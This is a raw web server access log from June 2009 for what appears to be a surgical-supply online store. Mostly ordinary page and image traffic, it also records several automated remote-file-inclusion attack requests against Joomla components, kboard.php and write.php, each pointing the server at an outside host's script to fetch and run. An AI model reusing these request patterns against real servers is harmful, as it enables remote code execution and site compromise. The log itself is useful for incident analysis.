83.98.209.71 - - [24/Jun/2009:08:32:22 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
83.98.209.71 - - [24/Jun/2009:08:32:28 -0400] "GET /logs/error_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
124.32.56.166 - - [24/Jun/2009:08:32:35 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
124.32.56.166 - - [24/Jun/2009:08:32:36 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
124.32.56.166 - - [24/Jun/2009:08:32:37 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
124.32.56.166 - - [24/Jun/2009:08:32:58 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
155.212.232.66 - - [24/Jun/2009:08:33:17 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:33:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:33:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:33:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
124.32.56.166 - - [24/Jun/2009:08:33:20 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
83.98.209.71 - - [24/Jun/2009:08:33:28 -0400] "GET /logs/access_log.Q109061800%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
172.16.1.87 - - [24/Jun/2009:08:33:34 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [24/Jun/2009:08:33:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [24/Jun/2009:08:33:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
220.79.47.122 - - [24/Jun/2009:08:33:43 -0400] "GET /logs/error_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.youlaw.net/bbs/sk.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
220.79.47.122 - - [24/Jun/2009:08:33:43 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.youlaw.net/bbs/sk.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
220.79.47.122 - - [24/Jun/2009:08:33:44 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.youlaw.net/bbs/sk.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
172.16.1.168 - - [24/Jun/2009:08:34:03 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:08:34:03 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:08:34:03 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
155.212.232.66 - - [24/Jun/2009:08:34:22 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:34:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:34:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:34:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
172.16.1.168 - - [24/Jun/2009:08:35:20 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:08:35:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:08:35:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.3.40.137 - - [24/Jun/2009:08:35:29 -0400] "GET //index.php?str=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.3.40.137 - - [24/Jun/2009:08:35:38 -0400] "GET /logs//index.php?str=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.3.40.137 - - [24/Jun/2009:08:35:39 -0400] "GET /logs/access_log.Q109052800%20%20//index.php?str=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
172.16.1.80 - - [24/Jun/2009:08:35:43 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:08:35:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:08:35:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
155.212.232.66 - - [24/Jun/2009:08:36:05 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:36:05 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:36:05 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:36:05 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
74.3.40.137 - - [24/Jun/2009:08:36:09 -0400] "GET /logs/access_log.Q109051200%20%20//index.php?str=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
63.223.104.57 - - [24/Jun/2009:08:36:54 -0400] "GET /logs/access_log.Q109051000//include/write.php?dir=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
68.213.29.168 - - [24/Jun/2009:08:37:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
172.16.1.81 - - [24/Jun/2009:08:37:10 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.81 - - [24/Jun/2009:08:37:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.81 - - [24/Jun/2009:08:37:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
68.213.29.168 - - [24/Jun/2009:08:37:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:11 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:18 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio HTTP/1.1" 200 36038 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:32 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:32 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:33 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:33 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:33 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:33 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:33 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:33 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:33 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:33 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:34 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:34 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:34 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:34 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:34 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:35 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:35 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:35 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:35 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:35 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:35 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:35 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:35 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:36 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:36 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:36 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:37:40 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01512C47100384009EA007H+M37+ENG HTTP/1.1" 200 36038 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):nlperio" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
155.212.232.66 - - [24/Jun/2009:08:37:45 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
155.212.232.66 - - [24/Jun/2009:08:37:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
155.212.232.66 - - [24/Jun/2009:08:37:46 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
172.16.1.80 - - [24/Jun/2009:08:38:14 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:08:38:14 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:08:38:14 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [24/Jun/2009:08:38:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.67.26.40 - - [24/Jun/2009:08:38:26 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/ad.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.808"
172.16.1.80 - - [24/Jun/2009:08:39:24 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:08:39:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:08:39:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
68.213.29.168 - - [24/Jun/2009:08:39:35 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01512C4010D3F400A24007H+M37+ENG HTTP/1.1" 200 37488 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01512C47100384009EA007H+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:39:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01512C4010D3F400A24007H+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:39:49 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01512C4010D3F400A24007H+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:39:50 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01512D4E111364000B2007H+M37+ENG HTTP/1.1" 200 38012 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01512C4010D3F400A24007H+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01512D4B13E3440013A007H+M37+ENG HTTP/1.1" 200 38013 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01512D4E111364000B2007H+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01512D431223C400355007H+M37+ENG HTTP/1.1" 200 38009 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01512D4B13E3440013A007H+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:39 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:40 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01512D431223C400355007H+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:40 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01512D431223C400355007H+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
172.16.1.81 - - [24/Jun/2009:08:40:40 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.81 - - [24/Jun/2009:08:40:40 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.81 - - [24/Jun/2009:08:40:40 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
68.213.29.168 - - [24/Jun/2009:08:40:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:54 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):7479300 HTTP/1.1" 200 45263 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:55 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):7479300" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
